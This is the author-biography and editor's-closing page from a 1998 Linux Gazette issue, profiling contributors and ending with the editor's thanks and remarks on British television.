Michael has been working with Linux for about five years now and works for Cablevision Systems in New York as a Web/Tech Administrator. In his spare time (ha!) he works on Everything Linux, a premiere Linux site on the Internet (http://eunuchs.org/linux/index.html), writes software, hacks until 3am and enjoys creating all manners of computer graphics.

Manuel Arturo Izquierdo

Manuel is an archaeologist graduated at the Universidad Nacional de Colombia. Currently he is working at the National Astronomical Observatory at the same university. There he has two research fields: the Archaeoastronomy and the Digital Astronomical Image Processing. He has been a Linux fan for three years using it for software development with the Tcl/Tk package and recently the GTK toolkit. The Observatory's network runs only under two platforms: Linux and Macintosh. The Observatory is very interested in promoting the use of Linux in the campus.

Ron Jachim

Ron is Manager of Systems for the Barbara Ann Karmanos Cancer Institute where he is responsible for the systems half of the Information Systems Group. He has fourteen years of networking experience and both a BA and an MS in Computer Science. His thesis was on fuzzy queries. He can be reached at [email protected]

Ron Jenkins

Ron has over 20 years experience in RF design, satellite systems, and UNIX/NT administration. He currently resides in Central Missouri where he will be spending the next 6 to 8 months recovering from knee surgery and looking for some telecommuting work. Ron is married and has two stepchildren.

Eberhard Lisse

Dr. Lisse is a Senior Medical Officer at the Swakopmund State Hospital on the Namibian coast. He is the founding Vice Chairman of the Namibian Internet Development Foundation (NAMIDEF) which has connected Namibia to the Internet in 1994 (using linux) and the country top level Domain Administrator for NA. He has been using Linux exclusively since 0.99.something. He is married to Martha and has two children, who prefer their mother's Mac LCIII to Linux (even with KDE).

Mike List

Mike is a father of four teenagers, musician, and recently reformed technophobe, who has been into computers since April,1996, and Linux since July, 1997.

Kevin O'Malley

Kevin is currently working at the University of Michigan Artificial Intelligence Laboratory as a System Research Programmer. He specializes in network programming and network security. His background includes GUI development, embedded systems development for medical products and programming visualization tools for vehicle simulations. He is currently working on the Michigan Adaptive Resource eXchange project (MARX), a dynamic computational market designed to enable adaptive allocation of resources in large-scale distributed information systems. The project is part of DARPA/ITO's Information Survivability Program. He is co-author of the paper "An API for Internet Auctions" appearing in the September 1998 issue of Dr. Dobb's Journal.

Dean Staff

Deanis a computer technician for Inly Systems and member of OCLUG. When not at work Dean enjoys spending time with his wife and two daughters and playing with his aquarium.

Peter Vertes

Peter has a degree in Computer Security from the University of Massachusetts at Amherst and currently is employed at BigFoot Partners in New York City.

Dan York

Dan York is a technical instructor and the training manager for a technology training company located in central New Hampshire. He has been working with the Internet and UNIX systems for 13 years. While his passion is with Linux, he has also spent the past two-and-a-half years working with Windows NT. He is both a Microsoft Certified System Engineer and Microsoft Certified Trainer and has also written a book for QUE on one of the MCSE certification exams.


Not Linux


Thanks to all our authors, not just the ones above, but also those who wrote giving us their tips and tricks and making suggestions. Thanks also to our new mirror sites. Thanks also to Ellen Dahl and Amy Kukuk for their help with News Bytes.

PBS has been showing a mystery series called "Jonathan Creek" that I have been enjoying quite a bit. The show can be quite intellectually challenging as each mystery is of the "locked door" variety. No car chases, no sirens, no explosions -- just a dead body in a locked room with all the accompanying questions. Quite a lot of fun, actually.

I've never been quite sure why the makers of American T.V. shows feel that their audience doesn't want or know how to use their brains.

Another interesting difference between American and British entertainment is the actors. The British don't require that everyone be uniformly beautiful. It's quite refreshing to see a show where the stars look like you and your neighbors rather than high-fashion models or movie stars.

Have fun!


Marjorie L. Richardson
Editor, Linux Gazette,


[ TABLE OF CONTENTS ] [ FRONT PAGE ]  Back


Linux Gazette Issue 34, November 1998, http://www.linuxgazette.com
This page written and maintained by the Editor of Linux Gazette,